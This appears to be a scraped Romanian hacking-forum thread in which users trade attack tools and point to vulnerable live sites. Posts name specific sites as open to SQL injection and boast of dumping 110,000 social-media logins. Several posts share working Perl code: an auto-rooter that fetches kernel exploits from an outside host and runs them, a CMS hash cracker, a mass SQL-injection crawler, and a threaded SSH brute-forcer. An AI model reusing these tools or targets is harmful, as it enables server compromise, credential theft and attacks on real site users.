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  1. NOT found by me Removed se pare ca merge un redirect de pe yahoo nu stiu ce si cum nu intrebati // Vedem daca iei ban
  2. ba da toti sunteti adevarati... eu m-am jucat cu el..e cam naspa dar sunt destule care merg si degeaba sunt milioane daca nu merg toate
  3. cine a folosit scrapebox pana acum? mi-am luat si eu o licenta si cateva tutoriale...dar sincer nu mi se pare ca e cine stie ce de capul lui....tot mai bun e xrumer..dar ala e prea scump.... Poate nu stiu eu sa il folosesc cum trebuie..asa ca ,care stie si are chef sa trimita un PM..ii multumesc in avans
  4. lol..... si ce faci ma cu el? si eu l-am cumparat si v1 si v3...v3 e cu keye...cum il vinzi tu la mai multi cu acelasi "serial" Eu l-am luat cu dedicat cu tot pe 3 luni..la v3 e mai bine ca nu mai bagi cookie merge si direct cu user/pass..pt incepatori e ok.....dar sigur nu se descurca sa il instaleze daca vreti le pun eu sus si v1 si v3..dar doar v1 merge fara key-a aia de eutentificare pe serverul lui jan..... mare vrajeala....e bun daca esti uploader pe undeva unde iei si $$(sau ai trackerul tau) asa...e pierdere de timp
  5. l-am testat si merge...cel putin boti apar pe irc...scannerul ori nu siu eu sa il fol ori e vechi....
  6. http://buytwitterfollowers.com/contact-box.php?id=153 Contact - Buy Facebook Fans http://www.buyyoutubeviews.com/contact-box.php?id=153 Credeti ca va inbogatiti cu paginile astea sau? NU le mai stergeti ca le omor DB daca iar dispar de aici..Nu au carduri in ele doar conturi de facebook youtube si alea alea..dar nah cum amjoritatea vindeti asa ceva.... Pacat....mai demult era ceva pe aici acum......cum pui ceva mai bun delete si la vip cu el sau pt folos personal...
  7. iti apare o casuta mica cu alert daca are xss
  8. http://buytwitterfollowers.com/contact-box.php?id=153' si restul de pagini de acolo cu facebook likes youtube visits.. Toate db sunt pe acelasi server 1 are tfaccts cu 110mii de emails+pass (de la fb,yt,tw,...etc) Have fun bine ca e doar un link.... greu era sa pui ' sau -- dupa el... You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''153''' at line 1 e mai bine asa?
  9. #!/usr/bin/perl #Coded By CrosS ( 2011 Linux Auto r00t3r ) print "###########################################################\n"; print "# (Beta 1.0 ) Auto rooter by CrosS #\n"; print "# Usage : #\n"; print "# perl $0 root => To root #\n"; print "# perl $0 del => Delete Exploit #\n"; print "# #\n"; print "# as R00TW0RM - Private Community is back #\n"; print "# so Releasing 2011 auto rooter =) #\n"; print "# in case of error mailto: mr.0x0day[AT]live.com #\n"; print "# #\n"; print "# Thanks to: r0073r and L0rd CrusAd3r #\n"; print "# http://www.r00tw0rm.com/1337 #\n"; print "###########################################################\n\n\n"; if ($ARGV[0] =~ "root" ) { system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.18.c"); system("gcc 2.6.18.c -o 2.6.18"); system("chmod 777 2.6.18"); system("./2.6.18"); system("id"); system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.33.c"); system("gcc 2.6.33.c -o 2.6.33"); system("chmod 777 2.6.33"); system("./2.6.33"); system("id"); system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.34.c"); system("gcc -w 2.6.34.c -o 2.6.34"); system("sudo setcap cap_sys_admin+ep 2.6.34"); system("./2.6.34"); system("id"); system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37-rc2.c"); system("gcc 2.6.37-rc2.c -o 2.6.37-rc2"); system("chmod 777 2.6.37-rc2"); system("./2.6.37-rc2"); system("id"); system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37.c"); system("gcc 2.6.37.c -o 2.6.37"); system("chmod 777 2.6.37"); system("./2.6.37"); system("id"); system("wget http://www.r00tw0rm.com/2o11Expl01t/"); system("gcc -w -o"); system("sudo setcap cap_sys_admin+ep"); system("chmod 777"); system("./"); system("id"); system("wget http://www.r00tw0rm.com/2o11Expl01t/3.0.c"); system("gcc 3.0.c -o 3.0"); system("chmod 777 3.0"); system("./3.0"); system("id"); } if ($ARGV[0] =~ "del" ) { print "All Exploit deleting ...\n"; system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*"); lol..scuze..This domain name expired on Feb 14 2012 12:11AM dar se poate modifica cu localele pe care le aveti deja
  10. #!usr/bin/perl use Digest::MD5 qw(md5_hex); use Digest::SHA1 qw(sha1_hex); # Author: localh0t # Date: 09/06/11 # Contact: mattdch0@gmail.com # Follow: @mattdch # Help if(!$ARGV[7]) { print "\n\n###########################################"; print "\n# Multi CMS Hash Cracker v0.1 by localh0t #"; print "\n###########################################"; print "\n\nUse: perl $0 -d [WORLDLIST FOLDER] -h [MD5 | SHA-1 HASH] -s [SALT | USERNAME] -c [CMS]\n"; print "Example: perl $0 -d /home/localh0t/wordlists/ -h caef8544a8e65e23f67ab844d4866e8d -s uZ*qX -c IPB\n"; print "Example: perl $0 -d /home/localh0t/wordlists/ -h dc4a27b25e3f780b89c165f931d6f85d5bd6e33e -s Administrator -c SMF\n\n"; print "Note: Worlists must end with .txt or .lst (or any extension)\n\n"; print "Support:\n========\n"; print "VB : md5_hex(md5_hex(password).salt) | (vBulletin)\n"; print "SMF : sha1_hex(user.password) | (Simple Machines Forum)\n"; print "IPB : md5_hex(md5_hex(salt).md5_hex(password)) | (Invision Power Board)\n"; print "JOOMLA : md5_hex(password.salt) | (Joomla 1.x)\n\n"; exit(0); } # Functions sub ipb_cracker{ my $hash = shift; my $salt = shift; my $dir = shift; foreach $file (@FILES) { open(DICT,"<".$dir.$file) || die "\n[-] Error opening $file\n\n"; print "[!] Using $file...\n"; foreach $password(<DICT>) { $password=~s/\s|\n//; chomp($password); $cracked = md5_hex(md5_hex($salt).md5_hex($password)); if ($cracked eq $hash) { return "[+] Hash cracked !: $password\n\n"; } } print "[!] Nothing found with $file...\n\n"; } return "\n[-] Password not found\n\n"; } sub vb_cracker{ my $hash = shift; my $salt = shift; my $dir = shift; foreach $file (@FILES) { open(DICT,"<".$dir.$file) || die "\n[-] Error opening $file\n\n"; print "[!] Using $file...\n"; foreach $password(<DICT>) { $password=~s/\s|\n//; chomp($password); $cracked = md5_hex(md5_hex($password).$salt); if ($cracked eq $hash) { return "[+] Hash cracked !: $password\n\n"; } } print "[!] Nothing found with $file...\n\n"; } return "\n[-] Password not found\n\n"; } sub smf_cracker{ my $hash = shift; my $user = shift; my $dir = shift; foreach $file (@FILES) { open(DICT,"<".$dir.$file) || die "\n[-] Error opening $file\n\n"; print "[!] Using $file...\n"; foreach $password(<DICT>) { $password=~s/\s|\n//; chomp($password); $cracked = sha1_hex($user.$password); if ($cracked eq $hash) { return "[+] Hash cracked !: $password\n\n"; } } print "[!] Nothing found with $file...\n\n"; } return "\n[-] Password not found\n\n"; } sub joomla_cracker{ my $hash = shift; my $salt = shift; my $dir = shift; foreach $file (@FILES) { open(DICT,"<".$dir.$file) || die "\n[-] Error opening $file\n\n"; print "[!] Using $file...\n"; foreach $password(<DICT>) { $password=~s/\s|\n//; chomp($password); $cracked = md5_hex($password.$salt); if ($cracked eq $hash) { return "[+] Hash cracked !: $password\n\n"; } } print "[!] Nothing found with $file...\n\n"; } return "\n[-] Password not found\n\n"; } my ($dir, $hash, $salt, $cms, $arg); foreach $loop (@ARGV) { for ($loop) { /^-d$/ and do { $dir = $ARGV[($arg+1)]; last; }; /^-h$/ and do { $hash = $ARGV[($arg+1)]; last; }; /^-s$/ and do { $salt = $ARGV[($arg+1)]; last; }; /^-c$/ and do { $cms = $ARGV[($arg+1)]; last; }; } $arg++; } # Main print "\n[!] Cracking $hash with $salt as username/salt...\n\n"; opendir(DIR, $dir) || die "\n[-] Folder not found\n\n"; while($file = readdir(DIR)) { if ($file ne '.' and $file ne '..') { $FILES[$clean] = $file; $clean++; } } for ($cms) { /^IPB$/ and do { $result = &ipb_cracker($hash,$salt,$dir); last; }; /^VB$/ and do { $result = &vb_cracker($hash,$salt,$dir); last; }; /^SMF$/ and do { $result = &smf_cracker($hash,$salt,$dir); last; }; /^JOOMLA$/ and do { $result = &joomla_cracker($hash,$salt,$dir); last; }; /^.$/ and do { print "[-] CMS not available\n"; exit(0); last; }; } print $result; # Exit close(DICT); closedir(DIR); exit(0); __END__
  11. sper sa fie de folos..se poate modifica usor
  12. #!/usr/bin/perl -w ########################################################################################## # IndiaN CYBeR F0rCE (ICF) Ma55 SQLI CRAWLER TOOL! # # Coded by B47CHGURU (ICF MOD ) on 7-07-2011 # # Updated on 12-08-2011 # #if any bugs are found ...plz do inform me at interestingpal@gmail.com # #reverse ip tool incorporated wont extract all websites.. use yougetsignal.com # #Note: You should first install HTML::LinkExtor module with CPAN shell # #----------------------------------------------------------------------------------------# #To all script kiddies..... changing the "made by" headers wont make you the coder...!! # #Respect the coderz..!!! # ########################################################################################## ########################CHANGE AREAS########################## $show = 0;####shows the extracted links ############################################################# if($^O =~ /Win/){ system("cls"); }else{ system("clear"); } print ("\n#######################################################\n"); print (" Welcome to INDIAN CYBER FORCE Mass sqli Crawler! BY B47CHGURU\n"); print ("########################################################\n\n\n"); use LWP::UserAgent; use HTML::LinkExtor; use URI::URL; use HTTP::Request; my $i = 1; my $sql = "'"; my $locate = ""; my @uri; my $count = 0; my $vul = 0; my $incount = 0; my $ua = LWP::UserAgent->new; $ua->timeout (20); $data='scanned.html'; $indicator = 'b'; open (CHECKR, "<$data"); @CHECKED = <CHECKR>; close CHECKR; foreach $Post(@CHECKED) { if ($Post=~/SQLI/){ $indicator = 'a'; } else { } } open HTML, ">>", "scanned.html" or die $!; if ($indicator=~/b/){ print HTML "<html xmlns=\"http://www.w3.org/1999/xhtml\"> \n <head> \n <title>I-C-F Mass SQLI Crawler..!!</title> \n </head>"; print HTML "<body id=\"#body\" body bgcolor=\"#000000\" text=\"#FFFFFF\" link=\"#FF3333\" vlink=\"#C0C0C0\" alink=\"#990000\" marginwidth=\"100\" align=\"left\"> \n"; print HTML "<br /> \n <center>\n <h1>I-C-F Mass SQLI Crawler v.1.0..!!</h1> \n <h2>####Scan results#### Greetz : 0p7!k f!ber,C0de inj3ctor, Coded32,LionAneesh,LuCky,DevilG4rg,jethro inwald & all indian hackers ....jaiHind.....</h2> \n "; } else { print HTML "<html xmlns=\"http://www.w3.org/1999/xhtml\"> \n <head> \n <title>I-C-F Mass SQLI Crawler..!!</title> \n </head>"; print HTML "<body id=\"#body\" body bgcolor=\"#000000\" text=\"#FFFFFF\" link=\"#FF3333\" vlink=\"#C0C0C0\" alink=\"#990000\" marginwidth=\"100\" align=\"left\"> \n"; print HTML "<br /> \n <center>\n "; } my @imgs = (); sub reverse { my($tag, %attr) = @_; return if $tag ne 'a'; push(@TARGETS, values %attr); } print " Do you want to do reverseip or load website list from file ..?(y/n)>"; my $revlist=<STDIN>; if($revlist =~ /y/){ print "\n IP/Website you want to reverse..\? >"; my $website=<STDIN>; chomp($website); my $linds = 'http://sameip.org/ip/' . $website; print (" \n ############################################## \n"); $url = $linds; $p = HTML::LinkExtor->new(\&reverse); $res = $ua->request(HTTP::Request->new(GET => $url), sub {$p->parse($_[0])}); my $base = $res->base; @TARGETS = map { $_ = url($_, $base)->abs; } @TARGETS; sort(@TARGETS); splice (@TARGETS, 0, 1); print join("\n", @TARGETS), "\n"; print (" \n ############################################## \n\n"); $linkno=$#TARGETS + 1; goto loop2; } else { } sub callback { my($tag, %attr) = @_; return if $tag ne 'a'; push(@imgs, values %attr); } print " Path to your website scan list. >"; my $list=<STDIN>; chomp($list); open (THETARGET, "<$list") || die "[-] Can't open the Website list !"; @TARGETS = <THETARGET>; close THETARGET; $linkno=$#TARGETS + 1; loop2: foreach $linds(@TARGETS){ @imgs = (); print ("\n"); print ("\n"); print join("\n", @imgs), "\n"; $incount = 0; chomp($linds); if ($linds =~ /sameip.org/ | $linds =~ /nameserverspy.org/ | $linds =~ /dailydomainspy.com/ | $linds =~ /dailydomains.org/){ next loop2; } $thelind = $linds; $thelind = clear($thelind); $thelind = trim($thelind); $url = $thelind; $p = HTML::LinkExtor->new(\&callback); $res = $ua->request(HTTP::Request->new(GET => $url), sub {$p->parse($_[0])}); my $base = $res->base; @imgs = map { $_ = url($_, $base)->abs; } @imgs; sort(@imgs); $linkdo=$#imgs + 1; if ($show =~ /1/){ print join("\n", @imgs), "\n"; } print("\n ------------------------------------------------------------- \n Scanning for vulnerabilities in $url \n ------------------------------------------------------------- \n"); sqli(); @imgs = (); print ("\n"); print ("\n"); print join("\n", @imgs), "\n"; $incount = 0 } # Scanning sub sqli{ loop: foreach $path(@imgs){ chomp($path); $webcl=$path; $webcl = trim($webcl); $url = $webcl; if($url=~/facebook/ | $url=~/mailto/){ next loop; } if($url=~/=/){ } else { next loop; } $incount=$incount+1; if($incount=~/36/){ next loop2; } if ($url =~ m/=/sim) { $url =~ s/=/='/g; } else { } print "\n $url"; my $req = HTTP::Request->new( GET => $url ); my $response = $ua->request( $req ); if( $response->content =~ /SQL/ || $response->content =~ /\/var\/www\//) { open OUTFILE, ">>", "scanned.txt" or die $!; print OUTFILE "$url \n"; if(($count+1)%2) { print HTML "\t\t\n<tr><td><a href=\"$url\"><font color=\"#66FF66\"><strong>$url</strong></font></a> \n </br> \n </br> \n"; } else { print HTML "\t\t\n<tr><td><a href=\"$url\"><font color=\"#66FF66\"><strong>$url</strong></font></a> \n </br> \n </br> \n"; } $count++; print "\n [+]", $url, "(",$count,"/",$incount,")"; close OUTFILE; } else { } } print "\n\n $count vulnerable links found in $linds. Extracted link count: $linkdo \n"; } sub clear{ $website = shift; if($website !~ /^http/){ $website = 'http://www.' . $website; } return $website; } sub trim{ $string = shift; $string =~ s/^\s+//; $string =~ s/\s+$//; return $string; } print ("\n\n Successfully scanned $linkno websites. View results in: 'scanned.html'.\n"); print HTML "\n </center>\n </body> \n </html>"; close HTML; if($^O =~ /Win/){ system('.\scanned.html'); }else{ system('./scanned.html'); }
  13. use strict; no warnings; use Net::SSH::Perl; use IO::Socket::INET; use threads; use threads::shared; #cmd to exec my $cmd = 'uname'; #threads num my $thrnm = 1; #Connection timeout (sec) my $timeout = 5; #ip's my $ifile = './iplist.txt'; #user list my $ufile = './users.txt'; #pass list my $pfile = './passw.txt'; #exec result list my $rfile = './res.txt'; my @ilist : shared = loadf($ifile); my @ulist = loadf($ufile); my @plist = loadf($pfile); $| = 1; my @trl = (); $trl[$_] = threads->create(\&main) for 0..$thrnm - 1; $_->join for @trl; sub main { while(@ilist) { my $host = shift @ilist; my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerProto => 'tcp', PeerPort => 22, Timeout => $timeout); unless($sock) { print "No connection to $host:22\n"; next; } for my $user(@ulist) { for my $pass(@plist) { my ($one, $two, undef) = ssh_it($host, $user, $pass, $cmd); if($one) { writef($rfile, "OK - $host:$user:$pass:$one\n"); } elsif($two) { writef($rfile, "Err - $host:$user:$pass:$two\n"); } } } } } sub ssh_it { my ($host, $user, $pass, $cmd) = @_; my $ssh = Net::SSH::Perl->new($host); #... eval { $ssh->login($user, $pass); }; unless($@) { print "[+] $host:$user:$pass\n"; my ($stdout, $stderr, undef) = $ssh->cmd($cmd); return ($stdout, $stderr); } else { print "[-] $host:$user:$pass\n"; } return 0; } sub writef { open(F, '>>', $_[0]) || warn $_[0].' - '.$!."\n"; print F $_[1]; close F; } sub loadf { open(F, '<', $_[0]) || die $_[0].' - '.$!."\n"; chomp(my @list = <F>); close F; return @list; } am gasit unu si pt ssh daca are careva nevoie
  14. lol am gasit acum 5 min un db cu peste 110mii de conturi de fb...ceva site ce vinde like...
  15. am gasit un site frumos ce vinde likeuri pe fb si mai multe ..am incercat schmafuzz si nu merge...kktu de havij intra in el..dar dureaza 1 an sa adun ce e pe acolo,sqlmap da timeout la conectare....plm
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